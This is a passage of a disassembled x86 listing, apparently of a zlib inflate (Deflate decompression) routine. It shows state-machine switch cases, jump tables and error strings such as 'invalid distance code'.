mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, [ebp+var_10]
mov ecx, eax
sub ecx, [esi]
mov [esi], eax
add [esi+8], ecx
mov [ebx+34h], edx
loc_4DC368: ; CODE XREF: sub_4DBC4B+806�j
push [ebp+arg_8]
jmp loc_4DC522
; ---------------------------------------------------------------------------
loc_4DC370: ; CODE XREF: sub_4DBC4B+29C�j
mov eax, [ebp+arg_0]
mov ecx, edi
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
mov eax, [ebp+arg_4]
sub ecx, [eax]
and dword ptr [eax+4], 0
mov [eax], edi
add [eax+8], ecx
loc_4DC38C: ; CODE XREF: sub_4DBC4B+657�j
; sub_4DBC4B+6FA�j
mov ecx, [ebp+var_C]
push [ebp+arg_8]
mov [ebx+34h], ecx
jmp loc_4DC579
; ---------------------------------------------------------------------------
loc_4DC39A: ; CODE XREF: sub_4DBC4B+30B�j
; sub_4DBC4B+596�j
mov eax, [ebp+arg_0]
push 0FFFFFFFCh
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, edi
sub eax, [esi]
mov [esi], edi
add [esi+8], eax
mov eax, [ebp+var_C]
mov [ebx+34h], eax
jmp loc_4DC522
; ---------------------------------------------------------------------------
loc_4DC3C2: ; CODE XREF: sub_4DBC4B+2D0�j
; sub_4DBC4B+2E4�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
mov dword ptr [ebx], 9
mov dword ptr [eax+18h], offset aTooManyLengthO ; "too many length or distance symbols"
mov [ebx+20h], ecx
mov ecx, [ebp+var_4]
mov [ebx+1Ch], ecx
mov ecx, [ebp+var_8]
mov [eax+4], ecx
mov ecx, edi
sub ecx, [eax]
mov [eax], edi
add [eax+8], ecx
jmp loc_4DC546
; ---------------------------------------------------------------------------
loc_4DC3F2: ; CODE XREF: sub_4DBC4B+3D2�j
cmp [ebp+var_14], 0FFFFFFFDh
loc_4DC3F6: ; CODE XREF: sub_4DBC4B+857�j
jnz short loc_4DC409
push dword ptr [ebx+0Ch]
push dword ptr [esi+28h]
call dword ptr [esi+24h]
pop ecx
mov dword ptr [ebx], 9
pop ecx
loc_4DC409: ; CODE XREF: sub_4DBC4B:loc_4DC3F6�j
mov eax, [ebp+arg_0]
push [ebp+var_14]
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, edi
sub eax, [esi]
mov [esi], edi
add [esi+8], eax
mov eax, [ebp+var_C]
mov [ebx+34h], eax
jmp loc_4DC522
; ---------------------------------------------------------------------------
loc_4DC432: ; CODE XREF: sub_4DBC4B+345�j
; sub_4DBC4B+415�j ...
mov eax, [ebp+arg_0]
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
and dword ptr [esi+4], 0
mov eax, edi
sub eax, [esi]
mov [esi], edi
add [esi+8], eax
mov eax, [ebp+var_C]
mov [ebx+34h], eax
jmp loc_4DC368
; ---------------------------------------------------------------------------
loc_4DC456: ; CODE XREF: sub_4DBC4B+4F9�j
; sub_4DBC4B+508�j
push dword ptr [ebx+0Ch]
push dword ptr [esi+28h]
call dword ptr [esi+24h]
mov eax, [ebp+arg_0]
mov dword ptr [ebx], 9
mov dword ptr [esi+18h], offset aInvalidBitLeng ; "invalid bit length repeat"
mov [ebx+20h], eax
mov eax, [ebp+var_4]
push 0FFFFFFFDh
mov [ebx+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, edi
sub eax, [esi]
push esi
mov [esi], edi
push ebx
add [esi+8], eax
mov eax, [ebp+var_C]
mov [ebx+34h], eax
call sub_4DD8DE
add esp, 14h
jmp loc_4DC583
; ---------------------------------------------------------------------------
loc_4DC49E: ; CODE XREF: sub_4DBC4B+579�j
cmp [ebp+var_14], 0FFFFFFFDh
jmp loc_4DC3F6
; ---------------------------------------------------------------------------
loc_4DC4A7: ; CODE XREF: sub_4DBC4B+633�j
mov dword ptr [ebx], 7
jmp short loc_4DC4B8
; ---------------------------------------------------------------------------
loc_4DC4AF: ; CODE XREF: sub_4DBC4B+4B�j
; DATA XREF: _4:off_4DC588�o
mov edi, [ebp+var_10] ; jumptable 004DBC96 case 7
mov esi, [ebp+arg_4]
mov ecx, [ebp+var_C]
loc_4DC4B8: ; CODE XREF: sub_4DBC4B+862�j
push [ebp+arg_8]
mov [ebx+34h], ecx
push esi
push ebx
call sub_4DD8DE
mov ecx, [ebx+34h]
add esp, 0Ch
cmp [ebx+30h], ecx
jz short loc_4DC4F1
mov edx, [ebp+arg_0]
mov [ebx+20h], edx
mov edx, [ebp+var_4]
mov [ebx+1Ch], edx
mov edx, [ebp+var_8]
mov [esi+4], edx
mov edx, edi
sub edx, [esi]
mov [esi], edi
add [esi+8], edx
mov [ebx+34h], ecx
loc_4DC4EE: ; CODE XREF: sub_4DBC4B+5E9�j
push eax
jmp short loc_4DC522
; ---------------------------------------------------------------------------
loc_4DC4F1: ; CODE XREF: sub_4DBC4B+883�j
mov dword ptr [ebx], 8
jmp short loc_4DC502
; ---------------------------------------------------------------------------
loc_4DC4F9: ; CODE XREF: sub_4DBC4B+4B�j
; DATA XREF: _4:off_4DC588�o
mov edi, [ebp+var_10] ; jumptable 004DBC96 case 8
mov esi, [ebp+arg_4]
mov ecx, [ebp+var_C]
loc_4DC502: ; CODE XREF: sub_4DBC4B+8AC�j
mov eax, [ebp+arg_0]
push 1
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, edi
sub eax, [esi]
mov [esi], edi
add [esi+8], eax
mov [ebx+34h], ecx
loc_4DC522: ; CODE XREF: sub_4DBC4B+720�j
; sub_4DBC4B+772�j ...
push esi
jmp short loc_4DC57A
; ---------------------------------------------------------------------------
loc_4DC525: ; CODE XREF: sub_4DBC4B+4B�j
; DATA XREF: _4:off_4DC588�o
mov eax, [ebp+arg_0] ; jumptable 004DBC96 case 9
mov ecx, [ebp+var_8]
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
mov eax, [ebp+arg_4]
mov [eax+4], ecx
mov ecx, [ebp+var_10]
mov edx, ecx
sub edx, [eax]
mov [eax], ecx
add [eax+8], edx
loc_4DC546: ; CODE XREF: sub_4DBC4B+687�j
; sub_4DBC4B+7A2�j
mov ecx, [ebp+var_C]
push 0FFFFFFFDh
mov [ebx+34h], ecx
jmp short loc_4DC579
; ---------------------------------------------------------------------------
loc_4DC550: ; CODE XREF: sub_4DBC4B+45�j
mov eax, [ebp+arg_0] ; default
mov ecx, [ebp+var_8]
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
mov eax, [ebp+arg_4]
push 0FFFFFFFEh
mov [eax+4], ecx
mov ecx, [ebp+var_10]
mov edx, ecx
sub edx, [eax]
mov [eax], ecx
mov ecx, [ebp+var_C]
add [eax+8], edx
mov [ebx+34h], ecx
loc_4DC579: ; CODE XREF: sub_4DBC4B+74A�j
; sub_4DBC4B+903�j
push eax
loc_4DC57A: ; CODE XREF: sub_4DBC4B+6B0�j
; sub_4DBC4B+8D8�j
push ebx
call sub_4DD8DE
add esp, 0Ch
loc_4DC583: ; CODE XREF: sub_4DBC4B+84E�j
pop edi
pop esi
pop ebx
leave
retn
sub_4DBC4B endp
; ---------------------------------------------------------------------------
off_4DC588 dd offset loc_4DBC9D ; DATA XREF: sub_4DBC4B+4B�r
dd offset loc_4DBD7B ; jump table for switch statement
dd offset loc_4DBDEE
dd offset loc_4DBED8
dd offset loc_4DBF70
dd offset loc_4DC02E
dd offset loc_4DC1FD
dd offset loc_4DC4AF
dd offset loc_4DC4F9
dd offset loc_4DC525
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DC5B0 proc near ; CODE XREF: sub_4DCF00+21�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_4]
push edi
mov edi, [ebp+arg_0]
push 0
push esi
push edi
call sub_4DBB53
push dword ptr [edi+28h]
push dword ptr [esi+28h]
call dword ptr [esi+24h]
push dword ptr [edi+24h]
push dword ptr [esi+28h]
call dword ptr [esi+24h]
push edi
push dword ptr [esi+28h]
call dword ptr [esi+24h]
add esp, 24h
xor eax, eax
pop edi
pop esi
pop ebp
retn
sub_4DC5B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DC5E6 proc near ; CODE XREF: sub_4DBC4B+E8�p
; sub_4DBC4B+58C�p
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov eax, [ebp+arg_10]
push 1Ch
push 1
push dword ptr [eax+28h]
call dword ptr [eax+20h]
add esp, 0Ch
test eax, eax
jz short loc_4DC618
mov cl, [ebp+arg_0]
and dword ptr [eax], 0
mov [eax+10h], cl
mov cl, [ebp+arg_4]
mov [eax+11h], cl
mov ecx, [ebp+arg_8]
mov [eax+14h], ecx
mov ecx, [ebp+arg_C]
mov [eax+18h], ecx
loc_4DC618: ; CODE XREF: sub_4DC5E6+15�j
pop ebp
retn
sub_4DC5E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DC61A proc near ; CODE XREF: sub_4DBC4B+5DE�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
mov edi, [ebp+arg_0]
mov eax, [esi]
mov [ebp+var_4], eax
mov eax, [esi+4]
mov edx, [edi+34h]
mov [ebp+var_8], eax
mov eax, [edi+20h]
mov ebx, [edi+4]
mov [ebp+arg_4], eax
mov eax, [edi+1Ch]
mov [ebp+arg_0], eax
mov eax, [edi+30h]
cmp edx, eax
jnb short loc_4DC652
sub eax, edx
dec eax
jmp short loc_4DC657
; ---------------------------------------------------------------------------
loc_4DC652: ; CODE XREF: sub_4DC61A+31�j
mov eax, [edi+2Ch]
sub eax, edx
loc_4DC657: ; CODE XREF: sub_4DC61A+36�j
mov [ebp+var_C], eax
loc_4DC65A: ; CODE XREF: sub_4DC61A+E9�j
; sub_4DC61A+16E�j ...
mov ecx, [ebx]
cmp ecx, 9 ; switch 10 cases
ja loc_4DCB7E ; default
jmp ds:off_4DCBB0[ecx*4] ; switch jump
loc_4DC66C: ; DATA XREF: _4:off_4DCBB0�o
cmp eax, 102h ; jumptable 004DC665 case 0
jb loc_4DC708
cmp [ebp+var_8], 0Ah
jb loc_4DC708
mov eax, [ebp+arg_4]
push esi
mov [edi+20h], eax
mov eax, [ebp+arg_0]
mov [edi+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, [ebp+var_4]
mov ecx, eax
push edi
sub ecx, [esi]
mov [esi], eax
add [esi+8], ecx
mov [edi+34h], edx
push dword ptr [ebx+18h]
movzx eax, byte ptr [ebx+11h]
push dword ptr [ebx+14h]
push eax
movzx eax, byte ptr [ebx+10h]
push eax
call sub_4DCBEB
mov [ebp+arg_8], eax
mov eax, [esi]
mov [ebp+var_4], eax
mov eax, [esi+4]
mov edx, [edi+34h]
mov [ebp+var_8], eax
mov eax, [edi+20h]
add esp, 18h
mov [ebp+arg_4], eax
mov eax, [edi+1Ch]
mov [ebp+arg_0], eax
mov eax, [edi+30h]
cmp edx, eax
jnb short loc_4DC6E5
sub eax, edx
dec eax
jmp short loc_4DC6EA
; ---------------------------------------------------------------------------
loc_4DC6E5: ; CODE XREF: sub_4DC61A+C4�j
mov eax, [edi+2Ch]
sub eax, edx
loc_4DC6EA: ; CODE XREF: sub_4DC61A+C9�j
cmp [ebp+arg_8], 0
mov [ebp+var_C], eax
jz short loc_4DC708
mov ecx, [ebp+arg_8]
dec ecx
neg ecx
sbb ecx, ecx
and ecx, 2
add ecx, 7
mov [ebx], ecx
jmp loc_4DC65A
; ---------------------------------------------------------------------------
loc_4DC708: ; CODE XREF: sub_4DC61A+57�j
; sub_4DC61A+61�j ...
movzx eax, byte ptr [ebx+10h]
mov [ebx+0Ch], eax
mov eax, [ebx+14h]
mov [ebx+8], eax
mov dword ptr [ebx], 1
loc_4DC71B: ; CODE XREF: sub_4DC61A+4B�j
; sub_4DC61A+12F�j
; DATA XREF: ...
mov eax, [ebx+0Ch] ; jumptable 004DC665 case 1
cmp [ebp+arg_0], eax
jnb short loc_4DC74B
cmp [ebp+var_8], 0
jz loc_4DCA88
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
and [ebp+arg_8], 0
dec [ebp+var_8]
movzx eax, byte ptr [eax]
shl eax, cl
or [ebp+arg_4], eax
inc [ebp+var_4]
add [ebp+arg_0], 8
jmp short loc_4DC71B ; jumptable 004DC665 case 1
; ---------------------------------------------------------------------------
loc_4DC74B: ; CODE XREF: sub_4DC61A+107�j
mov eax, ds:dword_4E0318[eax*4]
mov ecx, [ebx+8]
and eax, [ebp+arg_4]
lea eax, [ecx+eax*8]
mov [ebp+var_14], eax
movzx ecx, byte ptr [eax+1]
movzx eax, byte ptr [eax+1]
sub [ebp+arg_0], eax
mov eax, [ebp+var_14]
shr [ebp+arg_4], cl
movzx ecx, byte ptr [eax]
test ecx, ecx
mov [ebp+var_18], ecx
jnz short loc_4DC78D
mov eax, [eax+4]
mov dword ptr [ebx], 6
mov [ebx+8], eax
loc_4DC785: ; CODE XREF: sub_4DC61A+18D�j
; sub_4DC61A+1A7�j ...
mov eax, [ebp+var_C]
jmp loc_4DC65A
; ---------------------------------------------------------------------------
loc_4DC78D: ; CODE XREF: sub_4DC61A+15D�j
mov ecx, [ebp+var_18]
test cl, 10h
jz short loc_4DC7A9
and ecx, 0Fh
mov [ebx+8], ecx
mov eax, [eax+4]
mov [ebx+4], eax
mov dword ptr [ebx], 2
jmp short loc_4DC785
; ---------------------------------------------------------------------------
loc_4DC7A9: ; CODE XREF: sub_4DC61A+179�j
test cl, 40h
jz loc_4DC89A
test cl, 20h
jz loc_4DCA9A
mov dword ptr [ebx], 7
jmp short loc_4DC785
; ---------------------------------------------------------------------------
loc_4DC7C3: ; CODE XREF: sub_4DC61A+4B�j
; sub_4DC61A+1D7�j
; DATA XREF: ...
mov eax, [ebx+8] ; jumptable 004DC665 case 2
cmp [ebp+arg_0], eax
jnb short loc_4DC7F3
cmp [ebp+var_8], 0
jz loc_4DCA88
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
and [ebp+arg_8], 0
dec [ebp+var_8]
movzx eax, byte ptr [eax]
shl eax, cl
or [ebp+arg_4], eax
inc [ebp+var_4]
add [ebp+arg_0], 8
jmp short loc_4DC7C3 ; jumptable 004DC665 case 2
; ---------------------------------------------------------------------------
loc_4DC7F3: ; CODE XREF: sub_4DC61A+1AF�j
mov eax, ds:dword_4E0318[eax*4]
mov ecx, [ebx+8]
and eax, [ebp+arg_4]
mov dword ptr [ebx], 3
shr [ebp+arg_4], cl
add [ebx+4], eax
mov eax, ecx
sub [ebp+arg_0], eax
movzx eax, byte ptr [ebx+11h]
mov [ebx+0Ch], eax
mov eax, [ebx+18h]
mov [ebx+8], eax
loc_4DC81E: ; CODE XREF: sub_4DC61A+4B�j
; sub_4DC61A+232�j
; DATA XREF: ...
mov eax, [ebx+0Ch] ; jumptable 004DC665 case 3
cmp [ebp+arg_0], eax
jnb short loc_4DC84E
cmp [ebp+var_8], 0
jz loc_4DCA88
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
and [ebp+arg_8], 0
dec [ebp+var_8]
movzx eax, byte ptr [eax]
shl eax, cl
or [ebp+arg_4], eax
inc [ebp+var_4]
add [ebp+arg_0], 8
jmp short loc_4DC81E ; jumptable 004DC665 case 3
; ---------------------------------------------------------------------------
loc_4DC84E: ; CODE XREF: sub_4DC61A+20A�j
mov eax, ds:dword_4E0318[eax*4]
mov ecx, [ebx+8]
and eax, [ebp+arg_4]
lea eax, [ecx+eax*8]
mov [ebp+var_14], eax
movzx ecx, byte ptr [eax+1]
movzx eax, byte ptr [eax+1]
sub [ebp+arg_0], eax
mov eax, [ebp+var_14]
shr [ebp+arg_4], cl
movzx ecx, byte ptr [eax]
test cl, 10h
jz short loc_4DC891
and ecx, 0Fh
mov [ebx+8], ecx
mov eax, [eax+4]
mov [ebx+0Ch], eax
mov dword ptr [ebx], 4
jmp loc_4DC785
; ---------------------------------------------------------------------------
loc_4DC891: ; CODE XREF: sub_4DC61A+25E�j
test cl, 40h
jnz loc_4DCACF
loc_4DC89A: ; CODE XREF: sub_4DC61A+192�j
mov [ebx+0Ch], ecx
mov ecx, [eax+4]
lea eax, [eax+ecx*8]
mov [ebx+8], eax
jmp loc_4DC785
; ---------------------------------------------------------------------------
loc_4DC8AB: ; CODE XREF: sub_4DC61A+4B�j
; sub_4DC61A+2BF�j
; DATA XREF: ...
mov eax, [ebx+8] ; jumptable 004DC665 case 4
cmp [ebp+arg_0], eax
jnb short loc_4DC8DB
cmp [ebp+var_8], 0
jz loc_4DCA88
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
and [ebp+arg_8], 0
dec [ebp+var_8]
movzx eax, byte ptr [eax]
shl eax, cl
or [ebp+arg_4], eax
inc [ebp+var_4]
add [ebp+arg_0], 8
jmp short loc_4DC8AB ; jumptable 004DC665 case 4
; ---------------------------------------------------------------------------
loc_4DC8DB: ; CODE XREF: sub_4DC61A+297�j
mov eax, ds:dword_4E0318[eax*4]
mov ecx, [ebx+8]
and eax, [ebp+arg_4]
mov dword ptr [ebx], 5
shr [ebp+arg_4], cl
add [ebx+0Ch], eax
mov eax, ecx
sub [ebp+arg_0], eax
loc_4DC8F9: ; CODE XREF: sub_4DC61A+4B�j
; DATA XREF: _4:off_4DCBB0�o
mov ecx, [edi+28h] ; jumptable 004DC665 case 5
mov eax, edx
sub eax, [ebx+0Ch]
cmp eax, ecx
mov [ebp+var_10], eax
jnb short loc_4DC91E
mov eax, [edi+2Ch]
sub eax, ecx
mov [ebp+var_18], eax
loc_4DC910: ; CODE XREF: sub_4DC61A+302�j
mov eax, [ebp+var_10]
add eax, [ebp+var_18]
cmp eax, [edi+28h]
mov [ebp+var_10], eax
jb short loc_4DC910
loc_4DC91E: ; CODE XREF: sub_4DC61A+2EC�j
cmp dword ptr [ebx+4], 0
mov eax, [ebp+var_C]
jz loc_4DC9E3
loc_4DC92B: ; CODE XREF: sub_4DC61A+3C3�j
test eax, eax
jnz loc_4DC9B9
mov eax, [edi+2Ch]
cmp edx, eax
mov [ebp+var_14], eax
jnz short loc_4DC95B
mov eax, [edi+30h]
mov ecx, [edi+28h]
cmp eax, ecx
jz short loc_4DC95B
mov edx, ecx
cmp edx, eax
jnb short loc_4DC952
sub eax, edx
dec eax
jmp short loc_4DC957
; ---------------------------------------------------------------------------
loc_4DC952: ; CODE XREF: sub_4DC61A+331�j
mov eax, [ebp+var_14]
sub eax, edx
loc_4DC957: ; CODE XREF: sub_4DC61A+336�j
test eax, eax
jnz short loc_4DC9B9
loc_4DC95B: ; CODE XREF: sub_4DC61A+321�j
; sub_4DC61A+32B�j
push [ebp+arg_8]
mov [edi+34h], edx
push esi
push edi
call sub_4DD8DE
mov edx, [edi+34h]
mov [ebp+arg_8], eax
mov eax, [edi+30h]
add esp, 0Ch
cmp edx, eax
mov [ebp+var_18], eax
jnb short loc_4DC980
sub eax, edx
dec eax
jmp short loc_4DC985
; ---------------------------------------------------------------------------
loc_4DC980: ; CODE XREF: sub_4DC61A+35F�j
mov eax, [edi+2Ch]
sub eax, edx
loc_4DC985: ; CODE XREF: sub_4DC61A+364�j
mov ecx, [edi+2Ch]
mov [ebp+var_C], eax
cmp edx, ecx
mov [ebp+var_14], ecx
jnz short loc_4DC9B1
mov ecx, [edi+28h]
mov eax, [ebp+var_18]
cmp eax, ecx
jz short loc_4DC9AE
mov edx, ecx
cmp edx, eax
jnb short loc_4DC9A7
sub eax, edx
dec eax
jmp short loc_4DC9B1
; ---------------------------------------------------------------------------
loc_4DC9A7: ; CODE XREF: sub_4DC61A+386�j
mov eax, [ebp+var_14]
sub eax, edx
jmp short loc_4DC9B1
; ---------------------------------------------------------------------------
loc_4DC9AE: ; CODE XREF: sub_4DC61A+380�j
mov eax, [ebp+var_C]
loc_4DC9B1: ; CODE XREF: sub_4DC61A+376�j
; sub_4DC61A+38B�j ...
test eax, eax
jz loc_4DCADE
loc_4DC9B9: ; CODE XREF: sub_4DC61A+313�j
; sub_4DC61A+33F�j
mov ecx, [ebp+var_10]
and [ebp+arg_8], 0
mov cl, [ecx]
mov [edx], cl
inc edx
inc [ebp+var_10]
dec eax
mov ecx, [ebp+var_10]
mov [ebp+var_C], eax
cmp ecx, [edi+2Ch]
jnz short loc_4DC9DA
mov ecx, [edi+28h]
mov [ebp+var_10], ecx
loc_4DC9DA: ; CODE XREF: sub_4DC61A+3B8�j
dec dword ptr [ebx+4]
jnz loc_4DC92B
loc_4DC9E3: ; CODE XREF: sub_4DC61A+30B�j
; sub_4DC61A+469�j
and dword ptr [ebx], 0
jmp loc_4DC65A
; ---------------------------------------------------------------------------
loc_4DC9EB: ; CODE XREF: sub_4DC61A+4B�j
; DATA XREF: _4:off_4DCBB0�o
test eax, eax ; jumptable 004DC665 case 6
jnz loc_4DCA75
mov eax, [edi+2Ch]
cmp edx, eax
mov [ebp+var_14], eax
jnz short loc_4DCA1B
mov eax, [edi+30h]
mov ecx, [edi+28h]
cmp eax, ecx
jz short loc_4DCA1B
mov edx, ecx
cmp edx, eax
jnb short loc_4DCA12
sub eax, edx
dec eax
jmp short loc_4DCA17
; ---------------------------------------------------------------------------
loc_4DCA12: ; CODE XREF: sub_4DC61A+3F1�j
mov eax, [ebp+var_14]
sub eax, edx
loc_4DCA17: ; CODE XREF: sub_4DC61A+3F6�j
test eax, eax
jnz short loc_4DCA75
loc_4DCA1B: ; CODE XREF: sub_4DC61A+3E1�j
; sub_4DC61A+3EB�j
push [ebp+arg_8]
mov [edi+34h], edx
push esi
push edi
call sub_4DD8DE
mov edx, [edi+34h]
mov [ebp+arg_8], eax
mov eax, [edi+30h]
add esp, 0Ch
cmp edx, eax
mov [ebp+var_18], eax
jnb short loc_4DCA40
sub eax, edx
dec eax
jmp short loc_4DCA45
; ---------------------------------------------------------------------------
loc_4DCA40: ; CODE XREF: sub_4DC61A+41F�j
mov eax, [edi+2Ch]
sub eax, edx
loc_4DCA45: ; CODE XREF: sub_4DC61A+424�j
mov ecx, [edi+2Ch]
mov [ebp+var_C], eax
cmp edx, ecx
mov [ebp+var_14], ecx
jnz short loc_4DCA71
mov ecx, [edi+28h]
mov eax, [ebp+var_18]
cmp eax, ecx
jz short loc_4DCA6E
mov edx, ecx
cmp edx, eax
jnb short loc_4DCA67
sub eax, edx
dec eax
jmp short loc_4DCA71
; ---------------------------------------------------------------------------
loc_4DCA67: ; CODE XREF: sub_4DC61A+446�j
mov eax, [ebp+var_14]
sub eax, edx
jmp short loc_4DCA71
; ---------------------------------------------------------------------------
loc_4DCA6E: ; CODE XREF: sub_4DC61A+440�j
mov eax, [ebp+var_C]
loc_4DCA71: ; CODE XREF: sub_4DC61A+436�j
; sub_4DC61A+44B�j ...
test eax, eax
jz short loc_4DCADE
loc_4DCA75: ; CODE XREF: sub_4DC61A+3D3�j
; sub_4DC61A+3FF�j
mov cl, [ebx+8]
and [ebp+arg_8], 0
mov [edx], cl
inc edx
dec eax
mov [ebp+var_C], eax
jmp loc_4DC9E3
; ---------------------------------------------------------------------------
loc_4DCA88: ; CODE XREF: sub_4DC61A+10D�j
; sub_4DC61A+1B5�j ...
mov eax, [ebp+arg_4]
mov [edi+20h], eax
mov eax, [ebp+arg_0]
mov [edi+1Ch], eax
and dword ptr [esi+4], 0
jmp short loc_4DCAF0
; ---------------------------------------------------------------------------
loc_4DCA9A: ; CODE XREF: sub_4DC61A+19B�j
mov dword ptr [ebx], 9
mov dword ptr [esi+18h], offset aInvalidLiteral ; "invalid literal/length code"
loc_4DCAA7: ; CODE XREF: sub_4DC61A+4B�j
; sub_4DC61A+4C2�j
; DATA XREF: ...
mov eax, [ebp+arg_4] ; jumptable 004DC665 case 9
push 0FFFFFFFDh
mov [edi+20h], eax
mov eax, [ebp+arg_0]
mov [edi+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, [ebp+var_4]
mov ecx, eax
sub ecx, [esi]
mov [esi], eax
add [esi+8], ecx
mov [edi+34h], edx
jmp loc_4DCBA1
; ---------------------------------------------------------------------------
loc_4DCACF: ; CODE XREF: sub_4DC61A+27A�j
mov dword ptr [ebx], 9
mov dword ptr [esi+18h], offset aInvalidDistanc ; "invalid distance code"
jmp short loc_4DCAA7 ; jumptable 004DC665 case 9
; ---------------------------------------------------------------------------
loc_4DCADE: ; CODE XREF: sub_4DC61A+399�j
; sub_4DC61A+459�j
mov eax, [ebp+arg_4]
mov [edi+20h], eax
mov eax, [ebp+arg_0]
mov [edi+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
loc_4DCAF0: ; CODE XREF: sub_4DC61A+47E�j
mov eax, [ebp+var_4]
push [ebp+arg_8]
mov ecx, eax
sub ecx, [esi]
mov [esi], eax
add [esi+8], ecx
mov [edi+34h], edx
jmp loc_4DCBA1
; ---------------------------------------------------------------------------
loc_4DCB07: ; CODE XREF: sub_4DC61A+4B�j
; DATA XREF: _4:off_4DCBB0�o
cmp [ebp+arg_0], 7 ; jumptable 004DC665 case 7
jbe short loc_4DCB17
sub [ebp+arg_0], 8
inc [ebp+var_8]
dec [ebp+var_4]
loc_4DCB17: ; CODE XREF: sub_4DC61A+4F1�j
push [ebp+arg_8]
mov [edi+34h], edx
push esi
push edi
call sub_4DD8DE
mov edx, [edi+34h]
add esp, 0Ch
cmp [edi+30h], edx
jz short loc_4DCB53
mov ecx, [ebp+arg_4]
push eax
mov [edi+20h], ecx
mov ecx, [ebp+arg_0]
mov [edi+1Ch], ecx
mov ecx, [ebp+var_8]
mov [esi+4], ecx
mov ecx, [ebp+var_4]
mov ebx, ecx
sub ebx, [esi]
mov [esi], ecx
add [esi+8], ebx
mov [edi+34h], edx
jmp short loc_4DCBA1
; ---------------------------------------------------------------------------
loc_4DCB53: ; CODE XREF: sub_4DC61A+513�j
mov dword ptr [ebx], 8
loc_4DCB59: ; CODE XREF: sub_4DC61A+4B�j
; DATA XREF: _4:off_4DCBB0�o
mov eax, [ebp+arg_4] ; jumptable 004DC665 case 8
push 1
mov [edi+20h], eax
mov eax, [ebp+arg_0]
mov [edi+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, [ebp+var_4]
mov ecx, eax
sub ecx, [esi]
mov [esi], eax
add [esi+8], ecx
mov [edi+34h], edx
jmp short loc_4DCBA1
; ---------------------------------------------------------------------------
loc_4DCB7E: ; CODE XREF: sub_4DC61A+45�j
mov eax, [ebp+arg_4] ; default
push 0FFFFFFFEh
mov [edi+20h], eax
mov eax, [ebp+arg_0]
mov [edi+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, [ebp+var_4]
mov ecx, eax
sub ecx, [esi]
mov [esi], eax
add [esi+8], ecx
mov [edi+34h], edx
loc_4DCBA1: ; CODE XREF: sub_4DC61A+4B0�j
; sub_4DC61A+4E8�j ...
push esi
push edi
call sub_4DD8DE
add esp, 0Ch
pop edi
pop esi
pop ebx
leave
retn
sub_4DC61A endp
; ---------------------------------------------------------------------------
off_4DCBB0 dd offset loc_4DC66C ; DATA XREF: sub_4DC61A+4B�r
dd offset loc_4DC71B ; jump table for switch statement
dd offset loc_4DC7C3
dd offset loc_4DC81E
dd offset loc_4DC8AB
dd offset loc_4DC8F9
dd offset loc_4DC9EB
dd offset loc_4DCB07
dd offset loc_4DCB59
dd offset loc_4DCAA7
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DCBD8 proc near ; CODE XREF: sub_4DBB53+3A�p
; sub_4DBC4B+5F7�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push [ebp+arg_0]
mov eax, [ebp+arg_4]
push dword ptr [eax+28h]
call dword ptr [eax+24h]
pop ecx
pop ecx
pop ebp
retn
sub_4DCBD8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DCBEB proc near ; CODE XREF: sub_4DC61A+9A�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
mov esi, [ebp+arg_10]
push edi
mov edi, [ebp+arg_14]
mov ecx, [esi+34h]
mov edx, [esi+1Ch]
mov eax, [edi]
mov [ebp+var_C], ecx
mov [ebp+var_8], eax
mov eax, [edi+4]
mov [ebp+var_4], eax
mov eax, [esi+20h]
mov [ebp+arg_14], eax
mov eax, [esi+30h]
cmp ecx, eax
jnb short loc_4DCC20
sub eax, ecx
dec eax
jmp short loc_4DCC25
; ---------------------------------------------------------------------------
loc_4DCC20: ; CODE XREF: sub_4DCBEB+2E�j
mov eax, [esi+2Ch]
